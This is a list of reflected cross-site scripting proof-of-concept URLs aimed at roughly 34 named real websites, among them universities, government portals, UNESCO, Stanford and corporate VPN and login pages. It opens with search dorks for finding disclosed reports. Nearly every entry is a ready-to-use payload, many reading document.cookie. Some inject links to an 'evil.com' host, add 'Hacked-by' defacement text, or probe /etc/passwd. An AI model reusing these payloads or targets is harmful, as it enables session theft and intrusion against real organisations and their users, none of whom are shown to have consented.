Reflected XSS POC

Disclosed XSS Reports

site:openbugbounty.org inurl:reports intext:"*.com"
site:openbugbounty.org inurl:reports intext:"*.*.com"

-----------------------------------------------------------

Site-1: www.dumooresystems.com

https://www.dumooresystems.com/drainage-products.php?cat=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E

-----------------------------------------------------------

Site-2: tvtropes.org

https://tvtropes.org/pmwiki/index_report.php?filter=asad%22%3E%3Cscript%3Ealert(1)%3C/script%3E
https://tvtropes.org/pmwiki/login_prompt.php?referrer=%2Fpmwiki%2Farticle_history.php%3Farticle%3D%22%3E%3Cscript%3Ealert(1)%3C/script%3E
https://tvtropes.org/pmwiki/archived_discussion.php?s_t=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

-----------------------------------------------------------

Site-3: www.rallies.info

https://www.rallies.info/webentry/2022/yorkshirefestival/entries.php?type=s'-alert(1)-'

-----------------------------------------------------------

Site-4: www.dom-home.me

https://www.dom-home.me/index.php/x%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E/?strana=0&page=&lang=en

https://www.dom-home.me/index.php?strana=9&lang=novosti%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E

https://www.dom-home.me/index.php?strana=331&page=%3C/title%3E%3Cimg%20src=x%20onerror=%22alert(origin)%22%3E&lang=me

-----------------------------------------------------------

Site-5: www.littlehardware.com

https://www.littlehardware.com/inet/storefront/store.php?mode=showproductdetail%27%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E&product=-1&link_id=-1&link_itemcode=0917047&category=&department=36

-----------------------------------------------------------

Sit-6: www.amigus.org

https://www.amigus.org/?s=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
https://www.amigus.org/web/usuarios/infousu.php?id=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E
https://www.amigus.org/web/fotos/party2006/index.php?dia=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E&fotoid=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E&paxina=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E

-----------------------------------------------------------

Site-7: www.riftenergycorp.com

https://www.riftenergycorp.com/search?keywords=%22%3E%3Csvg%20onload=alert(1)%3E

-----------------------------------------------------------

Site-8: www.dahaboo.com

https://www.dahaboo.com/login.php/'"><script>alert(1)</script>

https://www.dahaboo.com/consoles-jeux-video-3/?t=1&q=ps4&'"><script>alert(1)</script>

https://www.dahaboo.com/annonces/?.'"><script>alert(1)</script>

---------------------------------------------------------

Site-10: qau.edu.pk

https://qau.edu.pk/lateralentry/viewrecord.php/vlist.php?dept=Botany&list=%27%22%3E%3Csvg/onload=alert(document.cookie)%3E
https://qau.edu.pk/even/fee.php?list=%27%22%3E%3Csvg/onload=alert(document.cookie)%3E
https://qau.edu.pk/lateralentry/viewrecord.php?id=UFM24-06391%27%22%3Csvg/onload=alert(document.cookie)%3E&list=1
https://ncb.qau.edu.pk/index.php/13-news.html?start=%277%22%3E%3Csvg/onload=alert(document.cookie)%3E
https://admissions.qau.edu.pk/msc/fee.php?list=%277%22%3E%3Csvg/onload=alert(document.cookie)%3E

-----------------------------------------------------------

Site-11: 3dcomment-prod.ext.net.nokia.com

https://3dcomment-prod.ext.net.nokia.com/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(/Hacked-by-Muhammad_Asad/)\u0022\u003e&SMAUTHREASON=7

-----------------------------------------------------------

Site-12: eportal.pwc.ca

https://eportal.pwc.ca/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7

-----------------------------------------------------------

Site-13: dic.sindhila.edu.pk

https://dic.sindhila.edu.pk/index.php?txtsrch=%3Csvg/onload=confirm(document.cookie)%3E

Site-14: pwr.nu.edu.pk

http://pwr.nu.edu.pk/news-detail/?news-detail=%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm%281%29%3E
http://pwr.nu.edu.pk/upcoming-event-detail/?event_detail=%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm%281%29%3E

-----------------------------------------------------------

Site-15: www.textileasia.com.pk

https://www.textileasia.com.pk/visitor-profile.php?id=faisalabad%22%3E%3Csvg%20onload=confirm(1)%3E

-----------------------------------------------------------

Site-16: iportal.riphah.edu.pk

https://iportal.riphah.edu.pk/serial-stats/?r=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

-----------------------------------------------------------

Site-17: deptewb.mcd.gov.in

https://deptewb.mcd.gov.in:8443/mcd_commonweb/cmnfileuploadgetDocumentScreen2.action?&category=EODB%20Checklist&loginType=CITIZEN&USER_INFO=02-e8de24eff7b4eac80fe70d819acec6b31063cedf&struts.token.name=mcd.token&mcd.token=8KV5RP2TIOKCDMLZVT03UKGBMQA8BHKP&node=22231%22%3E%3Csvg%20onload=confirm(document.cookie)%3Ehacked&LID=1525438014776-16

-----------------------------------------------------------

Site-18: www.hope.ac.uk

https://www.hope.ac.uk/eventsCalendar/t4.do?lang=en&dt=d.en.5326&f=month&d=01/10/2017%22%3E%3Csvg%20onload=confirm(document.cookie)%3E&sd=Friday,13October2017,&ac=*

-----------------------------------------------------------

Site-19: www.hope.ac.uk

http://adminonline.ucp.edu.pk/Admin/AdminLogoff.jsp?des=\"><ScRiPt>alert(1)</sCrIpT>
http://adminonline.ucp.edu.pk/Admin/AdminForgetPass.jsp?usr=\"><ScRiPt>alert(1)</sCrIpT>
http://adminonline.ucp.edu.pk/Admin/AdminLogin.jsp?usr=\"><ScRiPt>alert(1)</sCrIpT>

-----------------------------------------------------------

Site-20: pl.neduet.edu.pk

https://pl.neduet.edu.pk/?degtype=2&index_msg=Rxss\">K='><Svg/OnLoad=(confirm)(origin)>
https://nedan.neduet.edu.pk/index_detail.jsp?link=javascript:alert(origin)
https://pl.neduet.edu.pk/ajax.jsp?str=asad%22%3E%3Ca%20href=https://evil.com%3Ehacked%3Cimg%20src=x%20onerror=confirm(origin)%3E

-----------------------------------------------------------

Site-21: mcom.pgc.edu.pk

https://mcom.pgc.edu.pk/Admin/AdminLogin.jsp?usr=\%22oNmOuSeOvEr=prompt(1)//
https://mcom.pgc.edu.pk/Admin/AdminLogin.jsp?des=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(origin)%3E
https://mcom.pgc.edu.pk/Admin/AdminForgetPass.jsp?usr=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(origin)%3E
https://mcom.pgc.edu.pk/Admin/AdminForgetPass.jsp?des=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(origin)%3E
https://mcom.pgc.edu.pk/Student/StdLogin.jsp?des=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(origin)%3E

-----------------------------------------------------------

Site-22: adminonline.ucp.edu.pk

http://adminonline.ucp.edu.pk/Admin/AdminForgetPass.jsp?usr=\%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
http://adminonline.ucp.edu.pk/Admin/AdminForgetPass.jsp?des=\%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
http://adminonline.ucp.edu.pk/Admin/AdminLogoff.jsp?usr=\%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E
http://adminonline.ucp.edu.pk/Admin/AdminLogoff.jsp?des=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E
http://adminonline.ucp.edu.pk/Admin/AdminLogin.jsp?usr=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E
http://adminonline.ucp.edu.pk/Admin/AdminLogin.jsp?des=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E

-----------------------------------------------------------

Site-23: dv.ue.edu.pk

https://dv.ue.edu.pk/auth/alerts.php?er=%22%3E%3CImg+Src%3DOnXSS+OnError%3D%28alert%29%28origin%29%3E
https://dv.ue.edu.pk/auth/alerts.php?rs=%22%3E%3CImg+Src%3DOnXSS+OnError%3D%28alert%29%28origin%29%3E
https://dv.ue.edu.pk/auth/admin/alerts.php?er=%22%3E%3CImg+Src%3DOnXSS+OnError%3D%28alert%29%28origin%29%3E
https://dv.ue.edu.pk/auth/admin/alerts.php?rs=%22%3E%3CImg+Src%3DOnXSS+OnError%3D%28alert%29%28origin%29%3E
https://dv.ue.edu.pk/auth/admin/index1.php?er=%22%3E%3CImg+Src%3DOnXSS+OnError%3D%28alert%29%28origin%29%3E
https://dv.ue.edu.pk/auth/admin/index1.php?rs=%22%3E%3CImg+Src%3DOnXSS+OnError%3D%28alert%29%28origin%29%3E
https://dv.ue.edu.pk/auth/admin/login.php?er=%22%3E%3CImg+Src%3DOnXSS+OnError%3D%28alert%29%28origin%29%3E
https://dv.ue.edu.pk/auth/admin/login.php?rs=%22%3E%3CImg+Src%3DOnXSS+OnError%3D%28alert%29%28origin%29%3E

-----------------------------------------------------------

Site-24: www.dawn.com

https://www.dawn.com/news/1504211%22%3E%3Ca%20href=https://evil.com%3Ehacked%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E

-----------------------------------------------------------

Site-25: nust.edu.pk

https://nust.edu.pk/faq-category/ug-admission%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://qa.nust.edu.pk/news-category/excellent-performance-award%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://qa.nust.edu.pk/news-category/accreditation-of-engineering-programs-under-washington-accord%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://qa.nust.edu.pk/news-category/webinars%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://sc.seecs.nust.edu.pk/roschedule.php?scheduleid=%27%22%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=alert(origin)%3E
https://qdemocms.nust.edu.pk/slides?head=asad%27%22%3E%3Cimg%20src=x%20onerror=confirm(origin)%3E
https://www.fics.nust.edu.pk/about/evaluation.php?stage=1%27%22%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=alert(origin)%3E
https://www.fics.nust.edu.pk/idea/best.php?year=2024%27%22%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=alert(origin)%3E
https://www.fics.nust.edu.pk/admin/admin-login-secured.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
https://www.fics.nust.edu.pk/admin-login-secured.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
https://www.fics.nust.edu.pk/login.php?msg=%3Cscript%3Ealert(1)%3C/script%3E

-----------------------------------------------------------

Site-26: appneta-ft.vpn.broadcom.com

https://appneta-ft.vpn.broadcom.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer

-----------------------------------------------------------

Site-27: admission.lumhs.edu.pk

https://admission.lumhs.edu.pk/web/home/tv.php?filesrc=/etc/passwd&path=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(origin)%3E

-----------------------------------------------------------

Site-28: op.europa.eu

https://op.europa.eu/flexpaper/common/split_document.jsp?doc=d3e77637-a963-11eb-9585-01aa75ed71a1.en.PDF.pdf&userId&systemId=Portal2012&documentId=d3e77637-a963-11eb-9585-01aa75ed71a1&documentTitle=The+EU%E2%80%99s+2021-2027+long-term+budget+and+NextGenerationEU&documentPublishingDate&localeDirectory=%2Fflexpaper%2Flocale%2F&localeChain=en_US&fitWidth=true&documentLanguage=en%22;-alert(origin)-%22&share
https://op.europa.eu/flexpaper/common/split_document.jsp?doc=%3C/sCrIpT%3E%3CScRiPt%3Ealert(document.cookie)%3C/sCrIpT%3E
https://portal-training.emsa.europa.eu/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E

-----------------------------------------------------------

Site-29: www.embryohotel.com

http://www.embryohotel.com/room-detail.php?id=1%27%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E

-----------------------------------------------------------

Site-30: archive.jang.com.pk

https://archive.jang.com.pk/pic.asp?npic=03-16-2016/Lahore/images/02_01.gif%22;-alert(1)//
https://archive.jang.com.pk/10-20-2015/lahore/pic.asp?photo=10_01.jpg'"/><img%20src=x%20onerror=alert(1)>
https://archive.jang.com.pk/03-16-2016/lahore/pic.asp?picname=01_01.gif'"/><img%20src=x%20onerror=alert(1)>

-----------------------------------------------------------

Site-31: stanford.edu

http://odbook.stanford.edu/viewing%27%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E/anonymousagent/2?crumb_item_type=item&crumb_filter=creator.1
http://deme.stanford.edu/viewing/comment%22;-alert(document.cookie)-%22/new?populate_item=6
https://wellforlife-portal.stanford.edu/register.php?msg=%27%22/%3E%3Cimg%20src=x%3E%3Ca%20href=https://evil.com%3EClick%3C/strong%3E%3C/li%3E%3C/ul%3E%3C/div%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E

-----------------------------------------------------------

Site-32: library.mul.edu.pk

https://library.mul.edu.pk/details.php?tid=113'"><img src=x onerror=alert(document.cookie)>
https://mul.edu.pk/en/program/mphilms-computer-science%22%3EK='%3E%3CSvg%252FOnLoad=(confirm)(document.cookie)%3E

-----------------------------------------------------------

Site-33: unesco.org

https://gp.unesco.org/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
https://www.unesco.org/archives/multimedia/?pg=34iy3j4h234hjb23234&related=Gxss%27%22%3E%3Cimg/src/onerror=(confirm)(origin)%3E
https://www.unesco.org/archives/multimedia/?pg=34iy3j4h234hjb23234&related=Gxss%27%22%3E%3Cimg/src/onerror=(confirm)(origin)%3E
https://genbase.iiep.unesco.org/applis/tara/_login.php?page=/applis/tara/index.php%27%22%3E%3Ca%20href=https://evil.com%3Ehacked&CONFIG=1
https://www.unesco.org/archives/multimedia/index.php?page=2&pg=34&pattern&video=1\">K='><Svg/OnLoad=(confirm)(origin)>
http://www.unesco.org/archives/multimedia/index.php/index.php?pg=13&sp=13\">K='><Svg/OnLoad=(confirm)(origin)>&sj=Intangible+heritage
https://www.unesco.org/archives/multimedia/index.php/index.php/">K='><Svg/OnLoad=(confirm)(origin)>?pg=34&tp=Documentary
https://www.unesco.org/archives/multimedia/index.php?page=2&pg=34&pattern&audiopattern=audio+recording\">K='><Svg/OnLoad=(confirm)(origin)>

https://www.spencersmart.us/products.php?kat=%22%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E

Site-34: un.org

https://redatam.org/binmsr/RpWebStats.exe/Frequency?BASE=LFIC2018<sCrIpT>alert(document.cookie)</ScRiPt>&ITEM=FREQ1&lang=ENG
https://redatam.org/bincym/RpWebUtilities.exe/Text?LFN=<img src=x onerror=confirm(document.cookie)>&TYPE=TMP
https://redatam.org/bincym/RpWebStats.exe/Selection?BASE=HPC2010&FILENAME=%3CScRiPt%3Ealert(origin)%3C/ScRiPt%3E&OPERATION=OPEN&lang=ENG
https://redatam.org/bincym/RpWebUtilities.exe/Text%3CsCrIpT%3Ealert(origin)%3C/ScRiPt%3E
https://prod.redatam.org/binpry/RpWebStats.exe/Fraction?BASE=CPV2022<sCrIpT>alert(document.cookie)</ScRiPt>&ITEM=RELDEPAM&lang=ESP
https://prod.redatam.org/bintto/RpWebUtilities.exe/Text?LFN=<img src=x onerror=confirm(document.cookie)>&TYPE=TMP
https://unpog.org/knowledge/glossary.do?inputSearch=*/;prompt(document.cookie);/*